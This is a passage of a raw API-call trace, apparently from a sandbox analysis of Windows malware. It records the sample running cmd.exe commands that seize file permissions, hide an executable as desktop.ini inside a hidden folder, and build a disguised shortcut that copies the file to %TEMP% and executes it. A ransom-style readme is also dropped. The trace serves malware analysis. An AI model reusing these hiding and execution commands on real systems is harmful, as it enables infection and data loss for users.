users\\microsoft\\rac\\statedata\\racdatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.472] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf", lpFilePart=0x12eab4*="RacDatabase.sdf") returned 0x3a [0126.472] GetLastError () returned 0x20 [0126.472] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\xb810\x1d\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x51 [0126.472] LocalFree (hMem=0x1db810) returned 0x0 [0126.472] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0126.472] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0126.472] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0126.472] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0126.472] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0126.472] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0126.473] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\"", lpProcessInformation=0x12fba4*(hProcess=0x110, hThread=0x114, dwProcessId=0xf90, dwThreadId=0xf94)) returned 1 [0126.478] WaitForSingleObject (hHandle=0x110, dwMilliseconds=0xffffffff) returned 0x0 [0126.945] CloseHandle (hObject=0x110) returned 1 [0126.945] CloseHandle (hObject=0x114) returned 1 [0126.945] 
WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0126.945] ReleaseMutex (hMutex=0xf8) returned 1 [0126.945] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0126.945] ReleaseMutex (hMutex=0xf8) returned 1 [0126.945] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0126.945] ReleaseMutex (hMutex=0xf8) returned 1 [0126.945] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0126.945] ReleaseMutex (hMutex=0xf8) returned 1 [0126.945] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racdatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.945] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf", lpFilePart=0x12eab4*="RacDatabase.sdf") returned 0x3a [0126.945] GetLastError () returned 0x20 [0126.945] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\xb810\x1d\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x51 [0126.945] LocalFree (hMem=0x1db810) returned 0x0 [0126.945] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0126.946] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0126.946] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0126.946] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0126.946] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\", cchLength=0x2b | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\RAC\\STATEDATA\\") returned 0x2b [0126.946] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\RAC\\PUBLISHEDDATA\\") returned 0x2f [0126.946] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\RAC\\STATEDATA\\", cchCount1=43, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\RAC\\PUBLISHEDDATA\\", cchCount2=47) returned 3 [0126.946] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\", cchLength=0x2b | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\RAC\\STATEDATA\\") returned 0x2b [0126.946] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0126.946] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\RAC\\STATEDATA\\", cchCount1=43, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0126.946] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0126.947] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0126.947] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0126.947] 
GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\") returned 0x28 [0126.947] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0126.947] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0126.947] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xfc4, dwThreadId=0xfc8)) returned 1 [0126.949] CloseHandle (hObject=0x110) returned 1 [0126.949] CloseHandle (hObject=0x114) returned 1 [0126.949] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\bl0cked-readme.rtf")) returned 0xffffffff [0126.949] GetLastError () returned 0x2 [0126.949] CopyFileW 
(lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0126.953] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\bl0cked-readme.rtf")) returned 0x2020 [0126.953] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0126.953] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1f8790 [0126.953] FindClose (in: hFindFile=0x1f8790 | out: hFindFile=0x1f8790) returned 1 [0126.953] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0126.953] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0126.953] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0126.953] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0126.954] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\") returned 0x28 [0126.954] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0126.954] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0126.954] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\RAC\\StateData", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1") returned 0x27 [0126.955] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x15a | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x15a [0126.955] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0126.955] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h 
\"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0xfcc, dwThreadId=0xfd0)) returned 1 [0126.960] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0127.619] CloseHandle (hObject=0x114) returned 1 [0127.619] CloseHandle (hObject=0x110) returned 1 [0127.619] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0127.619] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1f8790 [0127.619] FindClose (in: hFindFile=0x1f8790 | out: 
hFindFile=0x1f8790) returned 1 [0127.619] GetTickCount () returned 0x28f72 [0127.619] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=18440828049) returned 1 [0127.619] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="M\x1dﯸ\x12萀\x1d") returned 1 [0127.619] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="T\x1dﯸ\x12萀\x1d") returned 1 [0127.619] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="X\x1dﯸ\x12萀\x1d") returned 1 [0127.619] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="L\x1dﯸ\x12萀\x1d") returned 1 [0127.619] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="0\x1dﯸ\x12萀\x1d") returned 1 [0127.619] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="s\x1dﯸ\x12萀\x1d") returned 1 [0127.619] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="p\x1dﯸ\x12萀\x1d") returned 1 [0127.619] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="o\x1dﯸ\x12萀\x1d") returned 1 [0127.619] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0127.619] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type 
\"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0127.619] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0127.619] CharUpperBuffW (in: lpsz="explorer.exe \"StateData\" & type \"StateData\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x63 | out: lpsz="EXPLORER.EXE \"STATEDATA\" & TYPE \"STATEDATA\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x63 [0127.619] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0127.619] CharUpperBuffW (in: lpsz="explorer.exe \"StateData\" & type \"StateData\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x64 | out: lpsz="EXPLORER.EXE \"STATEDATA\" & TYPE \"STATEDATA\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x64 [0127.619] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0127.619] CoInitialize (pvReserved=0x0) returned 0x0 [0127.620] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0127.621] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0127.621] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, 
Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0127.621] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0127.622] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"StateData\" & type \"StateData\\desktop.ini\" > \"%TEMP%\\MTXL0spo.exe\" && \"%TEMP%\\MTXL0spo.exe\"") returned 0x0 [0127.622] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0127.622] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0127.622] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0127.623] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData.lnk", fRemember=0) returned 0x0 [0127.629] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0127.629] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0127.629] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0127.629] CoUninitialize () [0127.629] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0127.629] ReleaseMutex (hMutex=0xf8) returned 1 [0127.629] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0127.630] ReleaseMutex (hMutex=0xf8) returned 1 [0127.630] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0127.630] ReleaseMutex (hMutex=0xf8) returned 1 [0127.630] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0127.630] ReleaseMutex (hMutex=0xf8) returned 1 [0127.630] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\BS0-Nm2046.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\bs0-nm2046.xlsx"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0127.630] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.630] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4a8f [0127.630] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.630] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=18441917908) returned 1 [0127.630] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.630] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4a8f [0127.630] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.630] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.630] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4a8f [0127.630] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.630] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0127.630] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x4a8f [0127.630] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0127.630] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.630] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4a8f [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 